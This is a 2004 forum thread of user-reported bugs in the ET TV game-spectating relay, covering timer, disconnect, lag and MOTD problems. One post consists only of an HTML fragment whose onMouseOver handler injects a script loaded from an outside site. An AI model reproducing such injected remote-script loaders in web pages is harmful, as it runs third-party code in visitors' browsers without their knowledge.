Forum for discussing ET TV

Moderators: Forum moderators, developers

bani
Site Admin

ET TV Known Bugs

Post by bani »

• weaponstats, topshots dont work
  • pointactivate doesn't work properly when the round is paused
Last edited by bani on Sun Oct 24, 2004 11:43 pm, edited 3 times in total.
eclipse+

Post by eclipse+ »

Is there a way to show the stats at the end of each round?
::Amish World Order::#awo @gamesurge.net::http://www.amishworldorder.org
*BiO*Tron

Post by *BiO*Tron »

I don't know if this helps you bani, but during the match tonight what happened was that the round timer wasn't wrong but it didn't show at all during one round. It was correctly displayed during the 3 others though. A friend of mine who was watching too had the same problem, but in a different round.
Mark

Post by Mark »

*BiO*Tron wrote:I don't know if this helps you bani, but during the match tonight what happened was that the round timer wasn't wrong but it didn't show at all during one round. It was correctly displayed during the 3 others though. A friend of mine who was watching too had the same problem, but in a different round.
I had the same. I guess, its because we haven't joined at the "real" start. I also haven'd seen the warmup messages / timer. Was ok in the other 3 rounds.

greets
Mark
Get owned at: Gaming@d1p.de (217.172.182.126:27960)
Hi! I'm a .signature *virus*! Copy me into your ~/.signature to help me spread!
bani
Site Admin

Post by bani »

yes, its either late joins or match pauses which bork it atm.
*BiO*Tron

Post by *BiO*Tron »

I noticed a couple more things last night. 8)

1. (I guess you already know that) The ETTV clients still get disconnected from time to time from the matchserver on map changes. It seemed like Quaketheism was more susceptible to that last night but it also happened to Oldcrow once at least.

2. I also saw that in earlier ETTV matches: Sometimes, the MOTD of the matchserver isn't relayed correctly to the ETTV server. I couldn't figure out if it has to do with the time you join (i.e. right after the ETTV server went online or later on) or with the server itself (i.e. Quaketheism/Oldcrow/...). What happens is that you either see the ETTV server text (sth. like ET 2.56 compatible etc.) or the full MOTD of the matchserver.

3. Another thing which happened before and which I could track down now: When there's a "match reset" vote on the matchserver and it is accepted, you can hear the "Fight!" announcement on ETTV and the round timer starts ticking down. This was irritiating the first time because it seemed like the match had started. ;)

4. I guess this is a tricky one: The match last night was played with new Clanbase rules, i.e. no grass on radar. However, the grass was still visible on ETTV, although I could use r_drawfoliage 0 without problems to turn it off. I suppose you would have to relay the punkbuster command (or is it realized with the ETPro cvar restrictions, dunno) to the ETTV server for that. Probably not worth the hassle, unless there's an easy solution to it. :)
*BiO*Tron

Post by *BiO*Tron »

I just found another weird one which occured for the first time tonight.

While in freecam mode, everything was fine and smooth but when I was following a player, the lagometer often hit the top and I got "Connection Interrupted". Not the whole time but most of the time. I've taken a short demo of it. I'll send you the link to it in a PM, bani.

I almost forgot; another bug I noticed tonight was that after the intermission time between two SW rounds was over, one could hear the announcer say "Fight!", although it was actually only the warmup of the next round.
v3rtigo

Post by v3rtigo »

*BiO*Tron wrote:I just found another weird one which occured for the first time tonight.

While in freecam mode, everything was fine and smooth but when I was following a player, the lagometer often hit the top and I got "Connection Interrupted". Not the whole time but most of the time. I've taken a short demo of it. I'll send you the link to it in a PM, bani.

I almost forgot; another bug I noticed tonight was that after the intermission time between two SW rounds was over, one could hear the announcer say "Fight!", although it was actually only the warmup of the next round.
oh and thats not all, today on ettv, the europe server just didn't switched map, the server switched to radar but the ettv stayed in oasis, and we saw all players outside of the map (oasis)
=FF=im2good4u

Post by =FF=im2good4u »

last time i was in ettv the follibg a palyer on screen was realy lagged while the game wasnt lol since i could stil hear him shooting or exploding and stuff

but free float was fine :roll:
Conzy

Post by Conzy »

Yesterday I saw theire was a ' wait room ' for ETTV but after 1 sec it disconnects...
=FF=im2good4u

Post by =FF=im2good4u »

waiting room servers are oldcrow server i though

well any way there is also a waiting room map i dunn oif in ettv yet
El_Sexy

Post by El_Sexy »

=FF=im2weak4u wrote:last time i was in ettv the follibg a palyer on screen was realy lagged while the game wasnt lol since i could stil hear him shooting or exploding and stuff

but free float was fine :roll:
That happened to me also. I was complaining about it too... but no one believed me :(
Rain

Post by Rain »

<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
*BiO*Tron

Post by *BiO*Tron »

I think that one has been reported before, not sure though:

After the first SW round of the e-star vs Mirage match was over tonight, I saw the level loading screen (where the MOTD was "borked" since it didn't show the new, combined MOTD of ETTV + game server, but only the MOTD of the game server), although the map wouldn't switch anyway. After it finished loading, the ETTV server started replaying the warmup of the first SW round, possibly the whole first round (I left after some time because it was a little boring to see the same again ;) ). Meanwhile the second round was already over as I heard on the shoutcast. It happened on the Oldcrows servers. I disconnected and reconnected and saw that both servers were affected.
bani
Site Admin

Post by bani »

known problem on oldcrows, i've poked rain to fix the scripts on the server.